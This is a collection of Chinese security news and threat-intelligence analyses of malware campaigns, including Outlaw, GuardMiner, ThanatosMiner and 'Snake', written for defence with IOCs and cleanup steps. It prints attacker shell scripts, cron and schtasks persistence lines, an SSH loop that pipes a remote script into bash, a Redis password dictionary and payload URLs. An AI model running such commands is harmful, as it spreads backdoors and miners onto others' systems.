据外媒BGR报道，一款名为FakeSpy的Android恶意软件重现江湖，目前主要目标是美国和西欧的用户。该应用能够窃取用户的短信、银行信息和应用数据。该恶意软件通过一条看似来自当地邮局的短信进行传播，并指示用户下载一款伪装成合法邮局应用的应用。 据Cybereason的一份新报告显示，一款名为FakeSpy的危险Android恶意软件已重新出现。FakeSpy是近三年前被安全研究人员首次发现的，是一款特别恶劣的恶意软件，旨在窃取用户的短信、财务数据、银行登录信息、应用数据、联系人列表等。 在最初的化身中，该应用的目标是韩国和日本的用户。不过最近，这款应用的野心更大了，现在开始针对全球的用户。目前，该恶意软件针对的一些国家包括中国、法国、德国、英国和美国。据悉，目前FakeSpy的迭代也比原来的版本更加强大和复杂，也就是说安卓用户要特别警惕，避免收到可疑信息。 FakeSpy的传播方式相当巧妙，首先是一条声称来自当地邮局的短信。短信中声称邮局试图投递一个包裹，但由于用户不在家而无法投递。然后，它提供了一个用户可以点击的链接，该链接引导用户下载一个伪装成合法邮政服务应用的应用程序。一旦安装在设备上，该应用就会将假短信以及恶意链接发送到用户的整个联系人列表中。 Cybereason补充道： 虚假应用是使用WebView构建的，WebView是Android的View类的一个流行扩展，可以让开发者显示一个网页。FakeSpy利用这个视图，在启动应用时将用户重定向到原来的邮局运营商网页，继续欺骗。这使得应用程序看起来合法，特别是考虑到这些应用程序的图标和用户界面。 一旦不知情的用户下载了假应用，恶意软件基本上就可以完全访问用户的设备。其中，它可以读取短信，发送短信，访问联系人信息，并从外部存储中读取。除此之外，该应用还特意寻找任何银行或加密货币相关的应用，以便窃取登录信息。 至于恶意软件的来源，研究人员称，所有迹象都指向一个名为 “Roaming Mantis “的组织。 Cybereason总结道： 恶意软件的作者似乎花了很大力气来改进这个恶意软件， 捆绑了许多新的升级，使其更加复杂、容易规避、装备精良。这些改进使FakeSpy成为市场上最强大的信息窃取者之一。我们预计这种恶意软件将继续发展，增加更多的新功能；现在唯一的问题是，我们何时才能看到下一波。     （稿源：cnBeta，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/4_E6kPuodxb3_inVCq2fqg   一、背景 腾讯安全威胁情报中心检测到国内大量企业遭遇亡命徒（Outlaw）僵尸网络攻击。亡命徒（Outlaw）僵尸网络最早于2018年被发现，其主要特征为通过SSH爆破攻击目标系统，同时传播基于Perl的Shellbot和门罗币挖矿木马。腾讯安全威胁情报中心安全大数据显示，亡命徒（Outlaw）僵尸网络已造成国内约2万台Linux服务器感染，影响上万家企业。 此次攻击传播的母体文件为dota3.tar.gz，可能为亡命徒（Outlaw）僵尸网络的第3个版本，母体文件释放shell脚本启动对应二进制程序，kswapd0负责进行门罗币挖矿，tsm32、tsm64负责继续SSH爆破攻击传播病毒。 亡命徒（Outlaw）僵尸网络之前通过利用Shellshock漏洞进行分发，因此被命名为“ Shellbot”。Shellbot利用物联网（IoT）设备和Linux服务器上的常见命令注入漏洞进行感染。Shellshock漏洞(CVE-2014-7169)是2014年在Bash command shell中发现的一个严重的漏洞，大多数Linux发行版通常会使用到该功能，攻击者可以在这些受影响的Linux服务器上远程执行代码。 亡命徒（Outlaw）僵尸网络利用SSH爆破入侵的攻击活动，可以被腾讯T-Sec高级威胁检测系统（御界）检测到： 腾讯T-Sec云防火墙可以检测亡命徒（Outlaw）僵尸网络的挖矿行为、Shellshock漏洞利用及暴力破解SSH登录口令等等攻击活动。 目前，Outlaw僵尸网络的影响仍在扩散，对企业服务器危害严重，腾讯安全系列产品已采取应急响应措施，执行清单如下： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）亡命徒（Outlaw）僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）亡命徒（Outlaw）僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）亡命徒（Outlaw）僵尸网络相关联的IOCs已支持识别检测； 2）云防火墙已支持对亡命徒（Outlaw）僵尸网络所采用挖矿协议的检测拦截、Shellshock漏洞利用检测以及采取SSH暴力破解的检测。 有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）云镜已支持检测云主机是否存在SSH弱口令，检测外部针对云主机的SSH弱口令爆破行为； 2）已支持查杀亡命徒（Outlaw）僵尸网络相关的挖矿木马、后门程序。 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 （Vulnerability Scan Service，VSS） 1）腾讯漏洞扫描服务已支持监测全网资产是否存在SSH弱口令。 2）腾讯漏洞扫描服务已支持检测全网资产是否受Shellshock漏洞CVE-2014-7169（UCS Manager相关）影响。   关于腾讯T-Sec漏洞扫描服务的更多信息，可参考：https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持： 1）御界已支持通过协议特征检测亡命徒（Outlaw）僵尸网络的挖矿行为； 2）御界已支持检测SSH弱口令爆破攻击行为； 3）腾讯御界已支持检测Shellshock漏洞CVE-2014-7169、CVE-2014-6271。 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统（御点） 1）可查杀亡命徒（Outlaw）僵尸网络释放的后门木马、挖矿木马程序； 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力，关于T-Sec终端安全管理系统的更多资料，可参考：https://s.tencent.com/product/yd/index.html 更多产品信息，请参考腾讯安全官方网站https://s.tencent.com/ 二、样本分析 Outlaw通过SSH爆破攻击，访问目标系统并下载带有shell脚本、挖矿木马、后门木马的TAR压缩包文件dota3.tar.gz。解压后的文件目录可以看到，根目录rsync下存放初始化脚本，a目录下存放shellbot后门，b目录下存放挖矿木马，c目录下存放SSH爆破攻击程序。 C目录下二进制文件tsm32、tsm64为SSH（22端口）扫描和爆破程序，并可以通过执行远程命名来下载和执行恶意程序。   爆破成功后执行base64编码的shell命令，主要功能为删除旧版本的恶意程序和目录，然后解压获取到的最新版本恶意程序并执行，内容如下： 命令1： #!/bin/bash cd /tmp rm -rf .ssh rm -rf .mountfs rm -rf .X13-unix rm -rf .X17-unix rm -rf .X19-unix rm -rf .X2* mkdir .X25-unix cd .X25-unix mv ar/tmp/dota3.tar.gz dota3.tar.gz tar xf dota3.tar.gz sleep 3s && cd .rsync; cat /tmp/.X25-unix/.rsync/initall | bash 2>1& sleep 45s && pkill -9 run && pkill -9 go && pkill -9 tsm exit 0 命令2： #!/bin/bash cd /tmp rm -rf .ssh rm -rf .mountfs rm -rf .X13-unix rm -rf .X17-unix rm -rf .X19-unix rm -rf .X2* mkdir .X25-unix cd .X25-unix mv ar/tmp/dota3.tar.gz dota3.tar.gz tar xf dota3.tar.gz sleep 3s && cd /tmp/.X25-unix/.rsync/c nohup /tmp/.X25-unix/.rsync/cm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1& sleep 8m && nohup /tmp/.X25-unix/.rsync/cm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1& sleep 20m && cd ..; /tmp/.X25-unix/.rsync/initall 2>1& exit 0 还会通过远程命令修改SSH公钥为： AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== 以便之后能更容易入侵。 B目录下run脚本主要内容为base64编码的shellbot后门程序，解码后可以看到代码仍然经过混淆。 把执行函数eval改为print可打印出解密后的代码，是基于Perl的Shellbot变种，连接C2服务器地址为45.9.148.99:443，能够执行多个后门命令，包括文件下载、执行shell cmd和DDoS攻击。如果接受到扫描端口命令，可针对以下端口进行扫描：”21″,”22″,”23″,”25″,”53″,”80″,”110″,”143″,”6665″。 A目录下二进制文件kswapd0为XMRig编译的Linux平台门罗币挖矿木马。 在初始化阶段会执行脚本init0来找到大量Linux平台竞品挖矿木马并进行清除。 在当前用户目录下创建/.configrc目录，拷贝a、b文件夹到该目录下并执行初始化脚本，然后通过写入cron.d安装计划任务进行持久化。写入定时任务如下： 1 1 */2 * * $dir2/a/upd>/dev/null 2>&1 @reboot $dir2/a/upd>/dev/null 2>&1 5 8 * * 0 $dir2/b/sync>/dev/null 2>&1 @reboot $dir2/b/sync>/dev/null 2>&1 0 0 */3 * * $dir/c/aptitude>/dev/null 2>&1 三、安全建议 建议企业Linux服务器管理员检查服务器资源占用情况，及时修改弱密码，避免被暴力破解。若发现服务器已被入侵安装挖矿木马，可参考以下步骤手动检查、清除： 1、 删除以下文件，杀死对应进程： /tmp/*-unix/.rsync/a/kswapd0 */.configrc/a/kswapd0 md5: 84945e9ea1950be3e870b798bd7c7559 /tmp/*-unix/.rsync/c/tsm64 md5: 4adb78770e06f8b257f77f555bf28065 /tmp/*-unix/.rsync/c/tsm32 md5: 10ea65f54f719bffcc0ae2cde450cb7a 2、 检查cron.d中是否存在包含以下内容的定时任务，如有进行删除： /a/upd /b/sync /c/aptitude IOCs IP 45.9.148.99 45.55.57.6 188.166.58.29 104.236.228.46 165.227.45.249 192.241.211.94 188.166.6.130 142.93.34.237 46.101.33.198 149.202.162.73 167.71.155.236 157.245.83.8 45.55.129.23 46.101.113.206 37.139.0.226 159.203.69.48 104.131.189.116 159.203.102.122 159.203.17.176 91.121.51.120 128.199.178.188 208.68.39.124 45.55.210.248 206.81.10.104 5.230.65.21 138.197.230.249 107.170.204.148 Md5 dota3.tar.gz 1a4592f48f8d1bf77895862e877181e0 kswapd0 84945e9ea1950be3e870b798bd7c7559 tsm64 4adb78770e06f8b257f77f555bf28065 tsm32 10ea65f54f719bffcc0ae2cde450cb7a run 716e6b533f836cee5e480a413a84645a URL http[:]//45.55.57.6/dota3.tar.gz http[:]//188.166.58.29/dota3.tar.gz http[:]//104.236.228.46/dota3.tar.gz http[:]//165.227.45.249/dota3.tar.gz http[:]//192.241.211.94/dota3.tar.gz http[:]//188.166.6.130/dota3.tar.gz http[:]//142.93.34.237/dota3.tar.gz http[:]//46.101.33.198/dota3.tar.gz http[:]//149.202.162.73/dota3.tar.gz http[:]//167.71.155.236/dota3.tar.gz http[:]//157.245.83.8/dota3.tar.gz http[:]//45.55.129.23/dota3.tar.gz http[:]//46.101.113.206/dota3.tar.gz http[:]//37.139.0.226/dota3.tar.gz http[:]//159.203.69.48/dota3.tar.gz http[:]//104.131.189.116/dota3.tar.gz http[:]//159.203.102.122/dota3.tar.gz http[:]//159.203.17.176/dota3.tar.gz http[:]//91.121.51.120/dota3.tar.gz http[:]//128.199.178.188/dota3.tar.gz http[:]//208.68.39.124/dota3.tar.gz http[:]//45.55.210.248/dota3.tar.gz http[:]//206.81.10.104/dota3.tar.gz http[:]//5.230.65.21/dota3.tar.gz http[:]//138.197.230.249/dota3.tar.gz http[:]//107.170.204.148/dota3.tar.gz  

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/oFnOODmShuuE5OUfbZKiEQ   一、背景 腾讯安全威胁情报中心检测到ThanatosMiner（死神矿工）挖矿木马利用BlueKeep漏洞CVE-2019-0708攻击传播。攻击者将公开的Python版本BlueKeep漏洞利用代码打包生成scan.exe，大范围扫描随机生成的IP地址进行探测和攻击。 漏洞利用成功后执行shellcode下载C#编写的木马svchost.exe，然后利用该木马下载门罗币挖矿木马以及攻击模块进行下一轮攻击。因Payload程序Assembly Name为ThanatosCrypt，将该挖矿木马命名为ThanatosMiner（死神矿工）。 2019年5月15日，微软发布了针对远程桌面服务（Remote Desktop Services ）的关键远程执行代码漏洞CVE-2019-0708的安全更新，该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞，便可以在目标系统上执行任意代码，该漏洞的触发无需任何用户交互操作——意味着，存在漏洞的电脑只需要连网，勿须任何操作即可能遭遇远程黑客攻击而沦陷。BlueKeep漏洞（CVE-2019-0708）是所有安全厂商高度重视的高危漏洞。 该漏洞影响旧版本的Windows系统，包括： Windows 7、WindowsServer 2008 R2、Windows Server 2008、Windows 2003、Windows XP。Windows 8和Windows10及之后版本不受此漏洞影响。 腾讯安全系列产品已全面支持对ThanatosMiner（死神矿工）挖矿木马的查杀拦截，腾讯安全专家强烈建议用户及时修补BlueKeep漏洞，避免电脑被挖矿木马自动扫描攻击后完全控制。 二、样本分析 攻击模块scan.exe通过pyinstaller打包Python代码生成exe，使用pyinstxtractor.py可解压出Python编译后的无后缀文件scan。pyinstaller在打包pyc的时候会去掉pyc的magic和时间戳，而打包的系统库文件中这两项内容会被保留，所以可以查看解压出的系统库中的magic和时间戳并添加到scan的文件头，然后将其命名为scan.pyc，并通过uncompyle6进行反编译，可以还原的Python代码scan.py。 分析发现，Python3版本编译后的二进制文件开头为e3 00 00 00 00 00 00 00，Python2版本通常为63 00 00 00 00 00 00 00。 scan.py获取本机同网段IP地址，以及随机生成的外网IP地址扫描3389端口。 利用公开的BlueKeep漏洞CVE-2019-0708攻击代码进行攻击。 漏洞攻击成功执行shellcode命令，在%Temp%目录下创建DO.vbs，下载执行http[:]//download.loginserv.net/svchost.exe。 Payload木马svchost.exe采样C#编写，代码经过Dotfuscator混淆处理，可使用开源工具De4dot去除部分混淆，程序的Assembly Name为ThanatosCrypt。 运行后会检测以下注册表项和磁盘文件判断是否在虚拟机中运行。 SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev SYSTEM\CurrentControlSet\Control\VirtualDeviceDrivers SOFTWARE\VMWare, Inc.\VMWare Tools SOFTWARE\Oracle\VirtualBox Guest Additions C:\windows\Sysnative\Drivers\Vmmouse.sys C:\windows\Sysnative\Drivers\vmci.sys C:\windows\Sysnative\Drivers\vmusbmouse.sys C:\windows\Sysnative\VBoxControl.exe 通过IsDebuggerPresent() 、IsDebuggerAttached()、CheckRemoteDebuggerPresent()判断进程是否被调试。 若无虚拟机环境、未处于被调试状态则继续执行。 然后svchost.exe继续下载http[:]//download.loginserv.net/scan.exe进行扫描攻击，以及下载http[:]//download.loginserv.net/xmrig.exe挖矿门罗币。 IOCs Domain download.loginserv.net MD5 URL http[:]//download.loginserv.net/svchost.exe http[:]//download.loginserv.net/xmrig.exe http[:]//download.loginserv.net/scan.exe http[:]//download.loginserv.net/mine.exe   参考链接 1.Windows远程桌面服务漏洞预警（CVE-2019-0708） https://mp.weixin.qq.com/s/aTSC0YR1dxSUHVJ3pnZezA 2.漏洞预警更新：Windows RDS漏洞（CVE-2019-0708） https://mp.weixin.qq.com/s/OEjI776O3cTjtMrsPdtnpQ 3.Windows远程桌面漏洞风险逼近，腾讯安全提供全面扫描修复方案 https://mp.weixin.qq.com/s/ckVHic2oChjZmVvH_zmsHA 4.Windows远程桌面服务漏洞（CVE-2019-0708）攻击代码现身 https://mp.weixin.qq.com/s/bcANAbzONFyrxqNMssTiLg 5.RDP漏洞(BlueKeep)野外利用预警，腾讯御知免费检测 https://mp.weixin.qq.com/s/G2ZS7rKkYYvEtbxUm0odGA 6.永恒之蓝下载器木马再升级，集成BlueKeep漏洞攻击能力 https://mp.weixin.qq.com/s/_teIut43g6In9YZ7VQ2f7w

Broadcom旗下的赛门铁克发现并警告用户：攻击者试图部署WastedLocker勒索软件，对美国公司进行了一系列攻击。这些攻击的最终目标是通过对受害者的大多数计算机和服务器进行加密来削弱受害者的IT基础架构，以要求获得数百万美元的赎金，目前至少有31个组织受到了攻击，这意味着攻击者已经破坏了目标组织的网络，并且正在为勒索软件攻击奠定基础。 是一种相对较新的定向勒索软件，在NCC Group发布之前就已被记录，而赛门铁克正在对受影响的网络进行扩展。WastedLocker被归因于臭名昭著的“Evil Corp”网络犯罪组织，Evil Corp曾与Dridex银行木马和BitPaymer勒索软件相关联，勒索金额高达数千万美元。两名涉嫌参与该组织的俄罗斯男子在美国对他们进行了公开起诉。 这些攻击始于一个名为SocGholish的基于javascript的恶意框架，该框架被追踪到超过150个受到威胁的网站伪装成软件进行更新。一旦攻击者进入了受害者的网络，他们就会使用Cobalt Strike恶意软件和一些非本土工具来盗取身份证件，升级特权，然后在网络中进行移动，以便在多台电脑上部署WastedLocker勒索软件。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1248/     消息来源：symantec-enterprise-blogs，译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接  

今年4月中旬，相关威胁监控系统检测到借助“世界银行与冠状病毒大流行有关的新倡议”的恶意软件，扩展名为 EXE 或 RAR， 在这些文件中有著名的 Rovnix bootkit。虽然利用冠状病毒这一话题进行传播的事情已屡见不鲜，但其使用UAC旁路工具进行了更新，且被用来提供一个与众不同的装载程序的实例却很少见。 这份名为《关于世界银行与冠状病毒pandemic.exe有关的新举措》的文件，是一份自解压的报告，其中列出了easymule.exe和1211.doc。 该文件确实包含有关世界银行一项新计划的信息，并且在元数据中引用了与该组织有关的真实个人作为作者。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1248/     消息来源：securelist，译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接  

谷歌的 Chrome Web Store 受到迄今为止规模最大的监视活动的打击。截止 2020 年 5 月，该活动通过下载超过 3200 万次的恶意扩展程序成功窃取了来自全球用户的数据。 Awake 安全威胁研究团队发布了一份研究报告指出，其发现了一个大规模的全球监视活动，该活动利用 Internet 域注册和浏览器功能的性质来监视和窃取来自多个地区和行业细分市场的用户的数据。研究表明，此犯罪活动是由单个 Internet 域注册商：CommuniGal Communication Ltd. (GalComm) 促进的。 并表示， 通过利用作为域名注册商的信任，GalComm 已启用了恶意活动，且该恶意活动已在检查的一百多个网络中被发现。此外，即使在网络安全方面进行了大量投资的复杂组织中，恶意活动也能够通过绕过多层安全控制措施而得以隐藏。 Awake 在报告中指出，通过 GalComm 注册的可访问域有 26,079 个，其中超过 15,000 个域为恶意或可疑。 仅在过去的三个月中，其就使用 GalComm 域收集了 111 个恶意或伪造的 Chrome 扩展程序，这些域用于攻击者的命令和控制基础结构和/或用作扩展程序的加载程序页面。这些扩展名可以截取屏幕截图、读取剪贴板、获取存储在 cookie 或参数中的凭据令牌，以及获取用户的击键（例如密码）等。 引诱安装恶意 Chrome 扩展程序的示例 截止 2020 年 5 月，这 111 个恶意扩展下载次数已达到 32,962,951 次。Awake 表示，该公司已与 Google 合作，着手从 Chrome 网上应用店中删除这些扩展程序。 针对此事，GalComm 负责人 Moshe Fogel 在与路透社的通信中则指出，“GalСomm 不参与任何恶意活动，可以说恰恰相反，我们与执法和安全机构合作，尽我们所能防止”。在 Awake Security 发表报告并列出所有可疑域名后， Moshe Fogel 也表示这些域名使用情况几乎都不活跃，并会继续调查其他域名。 有关报告的更多详细信息可查看：https://awakesecurity.com/blog/the-internets-new-arms-dealers-malicious-domain-registrars/   （稿源：cnBeta，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/-nUrNilr-iq7kbmopaqXwA   概述 腾讯安全威胁情报中心检测到跨平台挖矿木马GuardMiner近期十分活跃，该木马会扫描攻击Redis、Drupal、Hadoop、Spring、thinkphp、WebLogic、SQLServer、Elasticsearch多个服务器组件漏洞，并在攻陷的Windows和Linux系统中分别执行恶意脚本init.ps1，init.sh，恶意脚本会进一步下载门罗币挖矿木马、清除竞品挖矿木马并进行本地持久化运行。在Linux系统上利用SSH连接和Redis弱口令爆破进行内网扩散攻击。因挖矿守护进程使用文件名为sysguard、sysguerd、phpguard，腾讯安全威胁情报中心将该挖矿木马命名为GuardMiner。因该病毒已具备蠕虫化主动攻击扩散的能力，近期已有较多企业中招。 样本分析 1、init.ps1攻击Windows系统，从服务器下载挖矿进程phpupdate.exe，配置文件config.json，扫描攻击进程networkmanager.exe，持久化脚本newdat.ps1，挖矿守护进程phpguard.exe，清理脚本clean.bat。 2、init.sh攻击Linux系统，从服务器下载挖矿进程phpupdate，配置文件config.json，持久化脚本newdat.sh，扫描攻击进程networkmanager，挖矿守护进程phpuguard。 3、门罗币挖矿进程phpupdate.exe占用CPU接近100%： 挖矿使用的三组矿池和钱包分别如下： xmr.f2pool.com:13531 43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.v520 xmr-eu2.nanopool.org:14444 43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.v520 randomxmonero.hk.nicehash.com:3380 3HVQkSGfvyyQ8ACpShBhegoKGLuTCMCiAr.v520 4、清除竞品挖矿木马文件： 5、phpguard.exe、phpguard负责守护挖矿进程，进程退出后立即重启： 6、在Windows系统上通过安装计划任务持久化，每隔30分钟执行一次newdat.ps1： SchTasks.exe /Create /SC MINUTE /TN "Update service for Windows Service" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -File $HOME\newdat.ps1" /MO 30 /F 在Linux系统上通过定时任务持久化，每隔30分钟执行一次newdat.sh： crontab -l ; echo "*/30 * * * * sh /etc/newdat.sh >/dev/null 2>&1"   7、在Linux系统上还会通过sshown_hosts获取登录过的机器IP，建立SSH连接并执行远程shell脚本is.sh，进行内网扩散攻击： `if [ -f /root/.sshown_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE “\b([0-9]{1,3}\.){3}[0-9]{1,3}\b” /root/.sshown_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘curl -o-  http[:]//global.bitmex.com.de/cf67355a3333e6/is.sh | bash >/dev/null 2>&1 &’ & done fi` is.sh接着安装扫描工具Pnscan和Masscan针对全网段IP范围进行6379端口(Redis服务)扫描，并通过Redis弱口令爆破（密码字典：redis、root、oracle、password、p@aaw0rd、abc123、abc123!、123456、admin）以及未授权访问漏洞感染执行init.sh： 8、Windows系统上执行networkmanager.exe，Linux系统上执行networkmanager，开启漏洞扫描和利用攻击，针对以下服务器组件，攻击成功后在Windows系统执行Powershell脚本，在Linux系统执行shell脚本进行进行感染:Redis未授权访问漏洞； Drupal框架CVE-2018-7600漏洞； Hadoop未授权漏洞； Spring框架CVE-2018-1273漏洞； thinkphp框架TP5高危漏洞； WebLogic框架CVE-2017-10271漏洞； SQLServer框架xcmd_shell、SP_OACreate注入提权漏洞； Elasticsearch框架CVE-2015-1427、CVE-2014-3120远程代码执行漏洞。   病毒清除建议： 1.Windows系统用户推荐使用腾讯T-sec终端安全管理系统（腾讯御点）查杀； 2.Linux系统用户可按以下步骤手动清除： a.检查tmp、etc目录下是否具有以下文件，杀死对应的进程并删除文件： /tmp/phpupdate /tmp/networkmanager /tmp/phpguard /tmp/newdat.sh /tmp/config.json /etc/phpupdate /etc/networkmanager /etc/config.json /etc/newdat.sh b.检查crontab计划任务中是否包含执行”/tmp/newdat.sh”相关代码，如有删除该定时任务。 IOCs IP 185.247.117.64 209.182.218.161 178.157.91.26 146.71.79.230 43.245.222.57 URL http[:]//185.247.117.64/cf67355/phpupdate http[:]//global.bitmex.com.de/cf67355a3333e6/phpupdate http[:]//185.247.117.64/cf67355/newdat.sh http[:]//global.bitmex.com.de/cf67355a3333e6/newdat.sh http[:]//185.247.117.64/cf67355/config.json http[:]//global.bitmex.com.de/cf67355a3333e6/config.json http[:]//185.247.117.64/cf67355/networkmanager http[:]//global.bitmex.com.de/cf67355a3333e6/networkmanager http[:]//185.247.117.64/cf67355/phpguard http[:]//global.bitmex.com.de/cf67355a3333e6/phpguard http[:]//185.247.117.64/cf67355/phpupdate.exe http[:]//global.bitmex.com.de/cf67355a3333e6/phpupdate.exe http[:]//185.247.117.64/cf67355/config.json http[:]//global.bitmex.com.de/cf67355a3333e6/config.json http[:]//185.247.117.64/cf67355/networkmanager.exe http[:]//global.bitmex.com.de/cf67355a3333e6/networkmanager.exe http[:]//185.247.117.64/cf67355/newdat.ps1 http[:]//global.bitmex.com.de/cf67355a3333e6/newdat.ps1 http[:]//185.247.117.64/cf67355/phpguard.exe http[:]//global.bitmex.com.de/cf67355a3333e6/phpguard.exe http[:]//185.247.117.64/cf67355/clean.bat http[:]//global.bitmex.com.de/cf67355a3333e6/clean.bat    

6月10日，我们发现了一个伪装成简历的恶意Word文档，它使用模板注入来删除一个Net Loader。这是我们认为是APT攻击的一个部分，在最后阶段，威胁者使用Cobalt Strike的C2特性下载最终的有效载荷并执行C2通信。 这次袭击因为它的躲避技巧显得特别聪明。如我们观察到在执行来自恶意Word宏的有效负载时存在故意延迟。此外，通过将shell代码隐藏在一个无害的 JavaScript中并在不触及磁盘的情况下加载它，APT可以进一步阻止安全检测。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1248/     消息来源：malwarebyte，译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/QBkjAGuGBIZ7yzDNEYhxOg   概述 “贪吃蛇”挖矿木马曾在2019年4月被腾讯安全团队发现，因其在感染服务器后即会清除其他挖矿木马独占服务器资源而得名。“贪吃蛇”挖矿木马团伙主要针对MS SQL服务进行爆破弱口令攻击，爆破成功后会进行提权攻击获得系统权限，然后植入门罗币挖矿木马以及大灰狼远控木马。 “贪吃蛇”挖矿木马新变种的攻击流程 该团伙在2019年也对木马进行过一次更新，但第二个版本中被其他团队植入了后门（黑吃黑也是传统套路）。腾讯安全团队本次捕获的“贪吃蛇”挖矿木马新版在攻击流程上与前面略有区别。首先病毒对提权工具进行更新，抛弃了2015及以前的提权漏洞，引入2019年新的提权漏洞，病毒爆破成功之后提权获得系统权限的概率得以大幅提升。 “贪吃蛇”新版本清理的竞品挖矿木马也比旧版更多, 病毒还会添加Windows防火墙规则阻止其他挖矿木马入侵。攻击流程上也有所简化，不再借用第三方大厂的白文件，而是直接劫持系统进程或服务进行攻击。 腾讯安全T-Sec终端安全管理系统及腾讯电脑管家均可查杀该病毒，腾讯安全专家建议企业网管尽快纠正MS SQL服务器存在的弱口令风险，避免黑客远程爆破成功。 详细分析 攻击团伙对MS SQL服务器爆破成功后，会直接下载提权模块攻击以获取系统最高权限。与第一版贪吃蛇不同的是，第一版提权完成后会从网络上下载后续功能模块，而新版中在提权模块中直接包含后续的功能模块，大部分内嵌在PE中。 新版内嵌PE会存放在数据段 而旧版本是内嵌在资源段中 流程开始后首先释放提权模块，罗列了一下新版贪吃蛇与旧版使用的提权工具区别，提权漏洞升级了。 旧版本： 新版本： 提权工作完成后，释放SQLA.exe文件，该文件内置6个PE文件，其中2个文件是密文形式存放，逐个分析其功能。 Rundllexe.Dll：这个dll有内嵌x64版本，会被注册为打印机程序 Dll启动rundllexe.Exe Rundllexe.exe启动后把大灰狼远控注入到svchost中 大灰狼模块被释放到C:\Windows\MpMgSvc.dll中 C2: down.361com.com 备份rundll代码到注册表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ODBC\Rundll 接着下载x64.exe，hxxp://124.160.126.238/1.exe，这个模块主要用来投递挖矿木马，入口处通过修改Windows防火墙规则，阻止其他挖矿木马入侵。 解密出active_desktop_render.dll释放到c:\windows\help\ active_desktop_render.dll会把自身注册为服务，服务名GraphicsPerf_Svcs active_desktop_render.dll内置一个PE文件，解密后得到DeskTop EXE.主要负责投递挖矿木马，首先下载hxxp://118.45.42.72/Update.txt，文件中描述了挖矿木马名称及大小。 还需要根据配置描述，清除其他竞品挖矿木马 “加固清理”之后下载挖矿木马hxxp://www.362com.com/32.exe，并设置挖矿启动项，挖矿木马使用的文件名和系统文件名一样，以便伪装。 TrustedInsteller.exe WmiApSvr.exe WUDFhosts.exe HelpSvc.exe 劫持这4个系统文件，提高存活几率： 矿池及钱包仍然异或加密存储在文件中 矿池：pool.usa-138.com:80 钱包：4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S 